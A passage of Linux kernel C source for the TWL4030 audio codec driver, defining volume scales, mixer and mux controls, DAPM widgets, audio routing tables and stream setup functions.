*ucontrol) { struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (twl4030->configured) { dev_err(component->dev, "operation mode cannot be changed on-the-fly\n"); return -EBUSY; } return snd_soc_put_enum_double(kcontrol, ucontrol); } /* * FGAIN volume control: * from -62 to 0 dB in 1 dB steps (mute instead of -63 dB) */ static DECLARE_TLV_DB_SCALE(digital_fine_tlv, -6300, 100, 1); /* * CGAIN volume control: * 0 dB to 12 dB in 6 dB steps * value 2 and 3 means 12 dB */ static DECLARE_TLV_DB_SCALE(digital_coarse_tlv, 0, 600, 0); /* * Voice Downlink GAIN volume control: * from -37 to 12 dB in 1 dB steps (mute instead of -37 dB) */ static DECLARE_TLV_DB_SCALE(digital_voice_downlink_tlv, -3700, 100, 1); /* * Analog playback gain * -24 dB to 12 dB in 2 dB steps */ static DECLARE_TLV_DB_SCALE(analog_tlv, -2400, 200, 0); /* * Gain controls tied to outputs * -6 dB to 6 dB in 6 dB steps (mute instead of -12) */ static DECLARE_TLV_DB_SCALE(output_tvl, -1200, 600, 1); /* * Gain control for earpiece amplifier * 0 dB to 12 dB in 6 dB steps (mute instead of -6) */ static DECLARE_TLV_DB_SCALE(output_ear_tvl, -600, 600, 1); /* * Capture gain after the ADCs * from 0 dB to 31 dB in 1 dB steps */ static DECLARE_TLV_DB_SCALE(digital_capture_tlv, 0, 100, 0); /* * Gain control for input amplifiers * 0 dB to 30 dB in 6 dB steps */ static DECLARE_TLV_DB_SCALE(input_gain_tlv, 0, 600, 0); /* AVADC clock priority */ static const char *twl4030_avadc_clk_priority_texts[] = { "Voice high priority", "HiFi high priority" }; static SOC_ENUM_SINGLE_DECL(twl4030_avadc_clk_priority_enum, TWL4030_REG_AVADC_CTL, 2, twl4030_avadc_clk_priority_texts); static const char *twl4030_rampdelay_texts[] = { "27/20/14 ms", "55/40/27 ms", "109/81/55 ms", "218/161/109 ms", "437/323/218 ms", "874/645/437 ms", "1748/1291/874 ms", "3495/2581/1748 ms" }; static SOC_ENUM_SINGLE_DECL(twl4030_rampdelay_enum, TWL4030_REG_HS_POPN_SET, 2, twl4030_rampdelay_texts); /* Vibra H-bridge direction mode */ static const char *twl4030_vibradirmode_texts[] = { "Vibra H-bridge direction", "Audio data MSB", }; static SOC_ENUM_SINGLE_DECL(twl4030_vibradirmode_enum, TWL4030_REG_VIBRA_CTL, 5, twl4030_vibradirmode_texts); /* Vibra H-bridge direction */ static const char *twl4030_vibradir_texts[] = { "Positive polarity", "Negative polarity", }; static SOC_ENUM_SINGLE_DECL(twl4030_vibradir_enum, TWL4030_REG_VIBRA_CTL, 1, twl4030_vibradir_texts); /* Digimic Left and right swapping */ static const char *twl4030_digimicswap_texts[] = { "Not swapped", "Swapped", }; static SOC_ENUM_SINGLE_DECL(twl4030_digimicswap_enum, TWL4030_REG_MISC_SET_1, 0, twl4030_digimicswap_texts); static const struct snd_kcontrol_new twl4030_snd_controls[] = { /* Codec operation mode control */ SOC_ENUM_EXT("Codec Operation Mode", twl4030_op_modes_enum, snd_soc_get_enum_double, snd_soc_put_twl4030_opmode_enum_double), /* Common playback gain controls */ SOC_DOUBLE_R_TLV("DAC1 Digital Fine Playback Volume", TWL4030_REG_ARXL1PGA, TWL4030_REG_ARXR1PGA, 0, 0x3f, 0, digital_fine_tlv), SOC_DOUBLE_R_TLV("DAC2 Digital Fine Playback Volume", TWL4030_REG_ARXL2PGA, TWL4030_REG_ARXR2PGA, 0, 0x3f, 0, digital_fine_tlv), SOC_DOUBLE_R_TLV("DAC1 Digital Coarse Playback Volume", TWL4030_REG_ARXL1PGA, TWL4030_REG_ARXR1PGA, 6, 0x2, 0, digital_coarse_tlv), SOC_DOUBLE_R_TLV("DAC2 Digital Coarse Playback Volume", TWL4030_REG_ARXL2PGA, TWL4030_REG_ARXR2PGA, 6, 0x2, 0, digital_coarse_tlv), SOC_DOUBLE_R_TLV("DAC1 Analog Playback Volume", TWL4030_REG_ARXL1_APGA_CTL, TWL4030_REG_ARXR1_APGA_CTL, 3, 0x12, 1, analog_tlv), SOC_DOUBLE_R_TLV("DAC2 Analog Playback Volume", TWL4030_REG_ARXL2_APGA_CTL, TWL4030_REG_ARXR2_APGA_CTL, 3, 0x12, 1, analog_tlv), SOC_DOUBLE_R("DAC1 Analog Playback Switch", TWL4030_REG_ARXL1_APGA_CTL, TWL4030_REG_ARXR1_APGA_CTL, 1, 1, 0), SOC_DOUBLE_R("DAC2 Analog Playback Switch", TWL4030_REG_ARXL2_APGA_CTL, TWL4030_REG_ARXR2_APGA_CTL, 1, 1, 0), /* Common voice downlink gain controls */ SOC_SINGLE_TLV("DAC Voice Digital Downlink Volume", TWL4030_REG_VRXPGA, 0, 0x31, 0, digital_voice_downlink_tlv), SOC_SINGLE_TLV("DAC Voice Analog Downlink Volume", TWL4030_REG_VDL_APGA_CTL, 3, 0x12, 1, analog_tlv), SOC_SINGLE("DAC Voice Analog Downlink Switch", TWL4030_REG_VDL_APGA_CTL, 1, 1, 0), /* Separate output gain controls */ SOC_DOUBLE_R_EXT_TLV("PreDriv Playback Volume", TWL4030_REG_PREDL_CTL, TWL4030_REG_PREDR_CTL, 4, 3, 0, snd_soc_get_volsw_r2_twl4030, snd_soc_put_volsw_r2_twl4030, output_tvl), SOC_DOUBLE_EXT_TLV("Headset Playback Volume", TWL4030_REG_HS_GAIN_SET, 0, 2, 3, 0, snd_soc_get_volsw_twl4030, snd_soc_put_volsw_twl4030, output_tvl), SOC_DOUBLE_R_EXT_TLV("Carkit Playback Volume", TWL4030_REG_PRECKL_CTL, TWL4030_REG_PRECKR_CTL, 4, 3, 0, snd_soc_get_volsw_r2_twl4030, snd_soc_put_volsw_r2_twl4030, output_tvl), SOC_SINGLE_EXT_TLV("Earpiece Playback Volume", TWL4030_REG_EAR_CTL, 4, 3, 0, snd_soc_get_volsw_twl4030, snd_soc_put_volsw_twl4030, output_ear_tvl), /* Common capture gain controls */ SOC_DOUBLE_R_TLV("TX1 Digital Capture Volume", TWL4030_REG_ATXL1PGA, TWL4030_REG_ATXR1PGA, 0, 0x1f, 0, digital_capture_tlv), SOC_DOUBLE_R_TLV("TX2 Digital Capture Volume", TWL4030_REG_AVTXL2PGA, TWL4030_REG_AVTXR2PGA, 0, 0x1f, 0, digital_capture_tlv), SOC_DOUBLE_TLV("Analog Capture Volume", TWL4030_REG_ANAMIC_GAIN, 0, 3, 5, 0, input_gain_tlv), SOC_ENUM("AVADC Clock Priority", twl4030_avadc_clk_priority_enum), SOC_ENUM("HS ramp delay", twl4030_rampdelay_enum), SOC_ENUM("Vibra H-bridge mode", twl4030_vibradirmode_enum), SOC_ENUM("Vibra H-bridge direction", twl4030_vibradir_enum), SOC_ENUM("Digimic LR Swap", twl4030_digimicswap_enum), }; static const struct snd_soc_dapm_widget twl4030_dapm_widgets[] = { /* Left channel inputs */ SND_SOC_DAPM_INPUT("MAINMIC"), SND_SOC_DAPM_INPUT("HSMIC"), SND_SOC_DAPM_INPUT("AUXL"), SND_SOC_DAPM_INPUT("CARKITMIC"), /* Right channel inputs */ SND_SOC_DAPM_INPUT("SUBMIC"), SND_SOC_DAPM_INPUT("AUXR"), /* Digital microphones (Stereo) */ SND_SOC_DAPM_INPUT("DIGIMIC0"), SND_SOC_DAPM_INPUT("DIGIMIC1"), /* Outputs */ SND_SOC_DAPM_OUTPUT("EARPIECE"), SND_SOC_DAPM_OUTPUT("PREDRIVEL"), SND_SOC_DAPM_OUTPUT("PREDRIVER"), SND_SOC_DAPM_OUTPUT("HSOL"), SND_SOC_DAPM_OUTPUT("HSOR"), SND_SOC_DAPM_OUTPUT("CARKITL"), SND_SOC_DAPM_OUTPUT("CARKITR"), SND_SOC_DAPM_OUTPUT("HFL"), SND_SOC_DAPM_OUTPUT("HFR"), SND_SOC_DAPM_OUTPUT("VIBRA"), /* AIF and APLL clocks for running DAIs (including loopback) */ SND_SOC_DAPM_OUTPUT("Virtual HiFi OUT"), SND_SOC_DAPM_INPUT("Virtual HiFi IN"), SND_SOC_DAPM_OUTPUT("Virtual Voice OUT"), /* DACs */ SND_SOC_DAPM_DAC("DAC Right1", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Left1", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Right2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Left2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_DAC("DAC Voice", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_AIF_IN("VAIFIN", "Voice Playback", 0, TWL4030_REG_VOICE_IF, 6, 0), /* Analog bypasses */ SND_SOC_DAPM_SWITCH("Right1 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassr1_control), SND_SOC_DAPM_SWITCH("Left1 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassl1_control), SND_SOC_DAPM_SWITCH("Right2 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassr2_control), SND_SOC_DAPM_SWITCH("Left2 Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassl2_control), SND_SOC_DAPM_SWITCH("Voice Analog Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_abypassv_control), /* Master analog loopback switch */ SND_SOC_DAPM_SUPPLY("FM Loop Enable", TWL4030_REG_MISC_SET_1, 5, 0, NULL, 0), /* Digital bypasses */ SND_SOC_DAPM_SWITCH("Left Digital Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_dbypassl_control), SND_SOC_DAPM_SWITCH("Right Digital Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_dbypassr_control), SND_SOC_DAPM_SWITCH("Voice Digital Loopback", SND_SOC_NOPM, 0, 0, &twl4030_dapm_dbypassv_control), /* Digital mixers, power control for the physical DACs */ SND_SOC_DAPM_MIXER("Digital R1 Playback Mixer", TWL4030_REG_AVDAC_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Digital L1 Playback Mixer", TWL4030_REG_AVDAC_CTL, 1, 0, NULL, 0), SND_SOC_DAPM_MIXER("Digital R2 Playback Mixer", TWL4030_REG_AVDAC_CTL, 2, 0, NULL, 0), SND_SOC_DAPM_MIXER("Digital L2 Playback Mixer", TWL4030_REG_AVDAC_CTL, 3, 0, NULL, 0), SND_SOC_DAPM_MIXER("Digital Voice Playback Mixer", TWL4030_REG_AVDAC_CTL, 4, 0, NULL, 0), /* Analog mixers, power control for the physical PGAs */ SND_SOC_DAPM_MIXER("Analog R1 Playback Mixer", TWL4030_REG_ARXR1_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog L1 Playback Mixer", TWL4030_REG_ARXL1_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog R2 Playback Mixer", TWL4030_REG_ARXR2_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog L2 Playback Mixer", TWL4030_REG_ARXL2_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_MIXER("Analog Voice Playback Mixer", TWL4030_REG_VDL_APGA_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("APLL Enable", SND_SOC_NOPM, 0, 0, apll_event, SND_SOC_DAPM_PRE_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_SUPPLY("AIF Enable", SND_SOC_NOPM, 0, 0, aif_event, SND_SOC_DAPM_PRE_PMU|SND_SOC_DAPM_POST_PMD), /* Output MIXER controls */ /* Earpiece */ SND_SOC_DAPM_MIXER("Earpiece Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_earpiece_controls[0], ARRAY_SIZE(twl4030_dapm_earpiece_controls)), SND_SOC_DAPM_PGA_E("Earpiece PGA", SND_SOC_NOPM, 0, 0, NULL, 0, earpiecepga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* PreDrivL/R */ SND_SOC_DAPM_MIXER("PredriveL Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_predrivel_controls[0], ARRAY_SIZE(twl4030_dapm_predrivel_controls)), SND_SOC_DAPM_PGA_E("PredriveL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, predrivelpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MIXER("PredriveR Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_predriver_controls[0], ARRAY_SIZE(twl4030_dapm_predriver_controls)), SND_SOC_DAPM_PGA_E("PredriveR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, predriverpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* HeadsetL/R */ SND_SOC_DAPM_MIXER("HeadsetL Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_hsol_controls[0], ARRAY_SIZE(twl4030_dapm_hsol_controls)), SND_SOC_DAPM_PGA_E("HeadsetL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, headsetlpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MIXER("HeadsetR Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_hsor_controls[0], ARRAY_SIZE(twl4030_dapm_hsor_controls)), SND_SOC_DAPM_PGA_E("HeadsetR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, headsetrpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* CarkitL/R */ SND_SOC_DAPM_MIXER("CarkitL Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_carkitl_controls[0], ARRAY_SIZE(twl4030_dapm_carkitl_controls)), SND_SOC_DAPM_PGA_E("CarkitL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, carkitlpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MIXER("CarkitR Mixer", SND_SOC_NOPM, 0, 0, &twl4030_dapm_carkitr_controls[0], ARRAY_SIZE(twl4030_dapm_carkitr_controls)), SND_SOC_DAPM_PGA_E("CarkitR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, carkitrpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* Output MUX controls */ /* HandsfreeL/R */ SND_SOC_DAPM_MUX("HandsfreeL Mux", SND_SOC_NOPM, 0, 0, &twl4030_dapm_handsfreel_control), SND_SOC_DAPM_SWITCH("HandsfreeL", SND_SOC_NOPM, 0, 0, &twl4030_dapm_handsfreelmute_control), SND_SOC_DAPM_PGA_E("HandsfreeL PGA", SND_SOC_NOPM, 0, 0, NULL, 0, handsfreelpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), SND_SOC_DAPM_MUX("HandsfreeR Mux", SND_SOC_NOPM, 5, 0, &twl4030_dapm_handsfreer_control), SND_SOC_DAPM_SWITCH("HandsfreeR", SND_SOC_NOPM, 0, 0, &twl4030_dapm_handsfreermute_control), SND_SOC_DAPM_PGA_E("HandsfreeR PGA", SND_SOC_NOPM, 0, 0, NULL, 0, handsfreerpga_event, SND_SOC_DAPM_POST_PMU|SND_SOC_DAPM_POST_PMD), /* Vibra */ SND_SOC_DAPM_MUX_E("Vibra Mux", TWL4030_REG_VIBRA_CTL, 0, 0, &twl4030_dapm_vibra_control, vibramux_event, SND_SOC_DAPM_PRE_PMU), SND_SOC_DAPM_MUX("Vibra Route", SND_SOC_NOPM, 0, 0, &twl4030_dapm_vibrapath_control), /* Introducing four virtual ADC, since TWL4030 have four channel for capture */ SND_SOC_DAPM_ADC("ADC Virtual Left1", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_ADC("ADC Virtual Right1", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_ADC("ADC Virtual Left2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_ADC("ADC Virtual Right2", NULL, SND_SOC_NOPM, 0, 0), SND_SOC_DAPM_AIF_OUT("VAIFOUT", "Voice Capture", 0, TWL4030_REG_VOICE_IF, 5, 0), /* Analog/Digital mic path selection. TX1 Left/Right: either analog Left/Right or Digimic0 TX2 Left/Right: either analog Left/Right or Digimic1 */ SND_SOC_DAPM_MUX("TX1 Capture Route", SND_SOC_NOPM, 0, 0, &twl4030_dapm_micpathtx1_control), SND_SOC_DAPM_MUX("TX2 Capture Route", SND_SOC_NOPM, 0, 0, &twl4030_dapm_micpathtx2_control), /* Analog input mixers for the capture amplifiers */ SND_SOC_DAPM_MIXER("Analog Left", TWL4030_REG_ANAMICL, 4, 0, &twl4030_dapm_analoglmic_controls[0], ARRAY_SIZE(twl4030_dapm_analoglmic_controls)), SND_SOC_DAPM_MIXER("Analog Right", TWL4030_REG_ANAMICR, 4, 0, &twl4030_dapm_analogrmic_controls[0], ARRAY_SIZE(twl4030_dapm_analogrmic_controls)), SND_SOC_DAPM_PGA("ADC Physical Left", TWL4030_REG_AVADC_CTL, 3, 0, NULL, 0), SND_SOC_DAPM_PGA("ADC Physical Right", TWL4030_REG_AVADC_CTL, 1, 0, NULL, 0), SND_SOC_DAPM_PGA_E("Digimic0 Enable", TWL4030_REG_ADCMICSEL, 1, 0, NULL, 0, digimic_event, SND_SOC_DAPM_POST_PMU), SND_SOC_DAPM_PGA_E("Digimic1 Enable", TWL4030_REG_ADCMICSEL, 3, 0, NULL, 0, digimic_event, SND_SOC_DAPM_POST_PMU), SND_SOC_DAPM_SUPPLY("micbias1 select", TWL4030_REG_MICBIAS_CTL, 5, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("micbias2 select", TWL4030_REG_MICBIAS_CTL, 6, 0, NULL, 0), /* Microphone bias */ SND_SOC_DAPM_SUPPLY("Mic Bias 1", TWL4030_REG_MICBIAS_CTL, 0, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("Mic Bias 2", TWL4030_REG_MICBIAS_CTL, 1, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("Headset Mic Bias", TWL4030_REG_MICBIAS_CTL, 2, 0, NULL, 0), SND_SOC_DAPM_SUPPLY("VIF Enable", TWL4030_REG_VOICE_IF, 0, 0, NULL, 0), }; static const struct snd_soc_dapm_route intercon[] = { /* Stream -> DAC mapping */ {"DAC Right1", NULL, "HiFi Playback"}, {"DAC Left1", NULL, "HiFi Playback"}, {"DAC Right2", NULL, "HiFi Playback"}, {"DAC Left2", NULL, "HiFi Playback"}, {"DAC Voice", NULL, "VAIFIN"}, /* ADC -> Stream mapping */ {"HiFi Capture", NULL, "ADC Virtual Left1"}, {"HiFi Capture", NULL, "ADC Virtual Right1"}, {"HiFi Capture", NULL, "ADC Virtual Left2"}, {"HiFi Capture", NULL, "ADC Virtual Right2"}, {"VAIFOUT", NULL, "ADC Virtual Left2"}, {"VAIFOUT", NULL, "ADC Virtual Right2"}, {"VAIFOUT", NULL, "VIF Enable"}, {"Digital L1 Playback Mixer", NULL, "DAC Left1"}, {"Digital R1 Playback Mixer", NULL, "DAC Right1"}, {"Digital L2 Playback Mixer", NULL, "DAC Left2"}, {"Digital R2 Playback Mixer", NULL, "DAC Right2"}, {"Digital Voice Playback Mixer", NULL, "DAC Voice"}, /* Supply for the digital part (APLL) */ {"Digital Voice Playback Mixer", NULL, "APLL Enable"}, {"DAC Left1", NULL, "AIF Enable"}, {"DAC Right1", NULL, "AIF Enable"}, {"DAC Left2", NULL, "AIF Enable"}, {"DAC Right1", NULL, "AIF Enable"}, {"DAC Voice", NULL, "VIF Enable"}, {"Digital R2 Playback Mixer", NULL, "AIF Enable"}, {"Digital L2 Playback Mixer", NULL, "AIF Enable"}, {"Analog L1 Playback Mixer", NULL, "Digital L1 Playback Mixer"}, {"Analog R1 Playback Mixer", NULL, "Digital R1 Playback Mixer"}, {"Analog L2 Playback Mixer", NULL, "Digital L2 Playback Mixer"}, {"Analog R2 Playback Mixer", NULL, "Digital R2 Playback Mixer"}, {"Analog Voice Playback Mixer", NULL, "Digital Voice Playback Mixer"}, /* Internal playback routings */ /* Earpiece */ {"Earpiece Mixer", "Voice", "Analog Voice Playback Mixer"}, {"Earpiece Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"Earpiece Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"Earpiece Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"Earpiece PGA", NULL, "Earpiece Mixer"}, /* PreDrivL */ {"PredriveL Mixer", "Voice", "Analog Voice Playback Mixer"}, {"PredriveL Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"PredriveL Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"PredriveL Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"PredriveL PGA", NULL, "PredriveL Mixer"}, /* PreDrivR */ {"PredriveR Mixer", "Voice", "Analog Voice Playback Mixer"}, {"PredriveR Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"PredriveR Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"PredriveR Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"PredriveR PGA", NULL, "PredriveR Mixer"}, /* HeadsetL */ {"HeadsetL Mixer", "Voice", "Analog Voice Playback Mixer"}, {"HeadsetL Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"HeadsetL Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"HeadsetL PGA", NULL, "HeadsetL Mixer"}, /* HeadsetR */ {"HeadsetR Mixer", "Voice", "Analog Voice Playback Mixer"}, {"HeadsetR Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"HeadsetR Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"HeadsetR PGA", NULL, "HeadsetR Mixer"}, /* CarkitL */ {"CarkitL Mixer", "Voice", "Analog Voice Playback Mixer"}, {"CarkitL Mixer", "AudioL1", "Analog L1 Playback Mixer"}, {"CarkitL Mixer", "AudioL2", "Analog L2 Playback Mixer"}, {"CarkitL PGA", NULL, "CarkitL Mixer"}, /* CarkitR */ {"CarkitR Mixer", "Voice", "Analog Voice Playback Mixer"}, {"CarkitR Mixer", "AudioR1", "Analog R1 Playback Mixer"}, {"CarkitR Mixer", "AudioR2", "Analog R2 Playback Mixer"}, {"CarkitR PGA", NULL, "CarkitR Mixer"}, /* HandsfreeL */ {"HandsfreeL Mux", "Voice", "Analog Voice Playback Mixer"}, {"HandsfreeL Mux", "AudioL1", "Analog L1 Playback Mixer"}, {"HandsfreeL Mux", "AudioL2", "Analog L2 Playback Mixer"}, {"HandsfreeL Mux", "AudioR2", "Analog R2 Playback Mixer"}, {"HandsfreeL", "Switch", "HandsfreeL Mux"}, {"HandsfreeL PGA", NULL, "HandsfreeL"}, /* HandsfreeR */ {"HandsfreeR Mux", "Voice", "Analog Voice Playback Mixer"}, {"HandsfreeR Mux", "AudioR1", "Analog R1 Playback Mixer"}, {"HandsfreeR Mux", "AudioR2", "Analog R2 Playback Mixer"}, {"HandsfreeR Mux", "AudioL2", "Analog L2 Playback Mixer"}, {"HandsfreeR", "Switch", "HandsfreeR Mux"}, {"HandsfreeR PGA", NULL, "HandsfreeR"}, /* Vibra */ {"Vibra Mux", "AudioL1", "DAC Left1"}, {"Vibra Mux", "AudioR1", "DAC Right1"}, {"Vibra Mux", "AudioL2", "DAC Left2"}, {"Vibra Mux", "AudioR2", "DAC Right2"}, /* outputs */ /* Must be always connected (for AIF and APLL) */ {"Virtual HiFi OUT", NULL, "DAC Left1"}, {"Virtual HiFi OUT", NULL, "DAC Right1"}, {"Virtual HiFi OUT", NULL, "DAC Left2"}, {"Virtual HiFi OUT", NULL, "DAC Right2"}, /* Must be always connected (for APLL) */ {"Virtual Voice OUT", NULL, "Digital Voice Playback Mixer"}, /* Physical outputs */ {"EARPIECE", NULL, "Earpiece PGA"}, {"PREDRIVEL", NULL, "PredriveL PGA"}, {"PREDRIVER", NULL, "PredriveR PGA"}, {"HSOL", NULL, "HeadsetL PGA"}, {"HSOR", NULL, "HeadsetR PGA"}, {"CARKITL", NULL, "CarkitL PGA"}, {"CARKITR", NULL, "CarkitR PGA"}, {"HFL", NULL, "HandsfreeL PGA"}, {"HFR", NULL, "HandsfreeR PGA"}, {"Vibra Route", "Audio", "Vibra Mux"}, {"VIBRA", NULL, "Vibra Route"}, /* Capture path */ /* Must be always connected (for AIF and APLL) */ {"ADC Virtual Left1", NULL, "Virtual HiFi IN"}, {"ADC Virtual Right1", NULL, "Virtual HiFi IN"}, {"ADC Virtual Left2", NULL, "Virtual HiFi IN"}, {"ADC Virtual Right2", NULL, "Virtual HiFi IN"}, /* Physical inputs */ {"Analog Left", "Main Mic Capture Switch", "MAINMIC"}, {"Analog Left", "Headset Mic Capture Switch", "HSMIC"}, {"Analog Left", "AUXL Capture Switch", "AUXL"}, {"Analog Left", "Carkit Mic Capture Switch", "CARKITMIC"}, {"Analog Right", "Sub Mic Capture Switch", "SUBMIC"}, {"Analog Right", "AUXR Capture Switch", "AUXR"}, {"ADC Physical Left", NULL, "Analog Left"}, {"ADC Physical Right", NULL, "Analog Right"}, {"Digimic0 Enable", NULL, "DIGIMIC0"}, {"Digimic1 Enable", NULL, "DIGIMIC1"}, {"DIGIMIC0", NULL, "micbias1 select"}, {"DIGIMIC1", NULL, "micbias2 select"}, /* TX1 Left capture path */ {"TX1 Capture Route", "Analog", "ADC Physical Left"}, {"TX1 Capture Route", "Digimic0", "Digimic0 Enable"}, /* TX1 Right capture path */ {"TX1 Capture Route", "Analog", "ADC Physical Right"}, {"TX1 Capture Route", "Digimic0", "Digimic0 Enable"}, /* TX2 Left capture path */ {"TX2 Capture Route", "Analog", "ADC Physical Left"}, {"TX2 Capture Route", "Digimic1", "Digimic1 Enable"}, /* TX2 Right capture path */ {"TX2 Capture Route", "Analog", "ADC Physical Right"}, {"TX2 Capture Route", "Digimic1", "Digimic1 Enable"}, {"ADC Virtual Left1", NULL, "TX1 Capture Route"}, {"ADC Virtual Right1", NULL, "TX1 Capture Route"}, {"ADC Virtual Left2", NULL, "TX2 Capture Route"}, {"ADC Virtual Right2", NULL, "TX2 Capture Route"}, {"ADC Virtual Left1", NULL, "AIF Enable"}, {"ADC Virtual Right1", NULL, "AIF Enable"}, {"ADC Virtual Left2", NULL, "AIF Enable"}, {"ADC Virtual Right2", NULL, "AIF Enable"}, /* Analog bypass routes */ {"Right1 Analog Loopback", "Switch", "Analog Right"}, {"Left1 Analog Loopback", "Switch", "Analog Left"}, {"Right2 Analog Loopback", "Switch", "Analog Right"}, {"Left2 Analog Loopback", "Switch", "Analog Left"}, {"Voice Analog Loopback", "Switch", "Analog Left"}, /* Supply for the Analog loopbacks */ {"Right1 Analog Loopback", NULL, "FM Loop Enable"}, {"Left1 Analog Loopback", NULL, "FM Loop Enable"}, {"Right2 Analog Loopback", NULL, "FM Loop Enable"}, {"Left2 Analog Loopback", NULL, "FM Loop Enable"}, {"Voice Analog Loopback", NULL, "FM Loop Enable"}, {"Analog R1 Playback Mixer", NULL, "Right1 Analog Loopback"}, {"Analog L1 Playback Mixer", NULL, "Left1 Analog Loopback"}, {"Analog R2 Playback Mixer", NULL, "Right2 Analog Loopback"}, {"Analog L2 Playback Mixer", NULL, "Left2 Analog Loopback"}, {"Analog Voice Playback Mixer", NULL, "Voice Analog Loopback"}, /* Digital bypass routes */ {"Right Digital Loopback", "Volume", "TX1 Capture Route"}, {"Left Digital Loopback", "Volume", "TX1 Capture Route"}, {"Voice Digital Loopback", "Volume", "TX2 Capture Route"}, {"Digital R2 Playback Mixer", NULL, "Right Digital Loopback"}, {"Digital L2 Playback Mixer", NULL, "Left Digital Loopback"}, {"Digital Voice Playback Mixer", NULL, "Voice Digital Loopback"}, }; static int twl4030_set_bias_level(struct snd_soc_component *component, enum snd_soc_bias_level level) { switch (level) { case SND_SOC_BIAS_ON: break; case SND_SOC_BIAS_PREPARE: break; case SND_SOC_BIAS_STANDBY: if (snd_soc_component_get_bias_level(component) == SND_SOC_BIAS_OFF) twl4030_codec_enable(component, 1); break; case SND_SOC_BIAS_OFF: twl4030_codec_enable(component, 0); break; } return 0; } static void twl4030_constraints(struct twl4030_priv *twl4030, struct snd_pcm_substream *mst_substream) { struct snd_pcm_substream *slv_substream; /* Pick the stream, which need to be constrained */ if (mst_substream == twl4030->master_substream) slv_substream = twl4030->slave_substream; else if (mst_substream == twl4030->slave_substream) slv_substream = twl4030->master_substream; else /* This should not happen.. */ return; /* Set the constraints according to the already configured stream */ snd_pcm_hw_constraint_single(slv_substream->runtime, SNDRV_PCM_HW_PARAM_RATE, twl4030->rate); snd_pcm_hw_constraint_single(slv_substream->runtime, SNDRV_PCM_HW_PARAM_SAMPLE_BITS, twl4030->sample_bits); snd_pcm_hw_constraint_single(slv_substream->runtime, SNDRV_PCM_HW_PARAM_CHANNELS, twl4030->channels); } /* In case of 4 channel mode, the RX1 L/R for playback and the TX2 L/R for * capture has to be enabled/disabled. */ static void twl4030_tdm_enable(struct snd_soc_component *component, int direction, int enable) { u8 reg, mask; reg = twl4030_read(component, TWL4030_REG_OPTION); if (direction == SNDRV_PCM_STREAM_PLAYBACK) mask = TWL4030_ARXL1_VRX_EN | TWL4030_ARXR1_EN; else mask = TWL4030_ATXL2_VTXL_EN | TWL4030_ATXR2_VTXR_EN; if (enable) reg |= mask; else reg &= ~mask; twl4030_write(component, TWL4030_REG_OPTION, reg); } static int twl4030_startup(struct snd_pcm_substream *substream, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (twl4030->master_substream) { 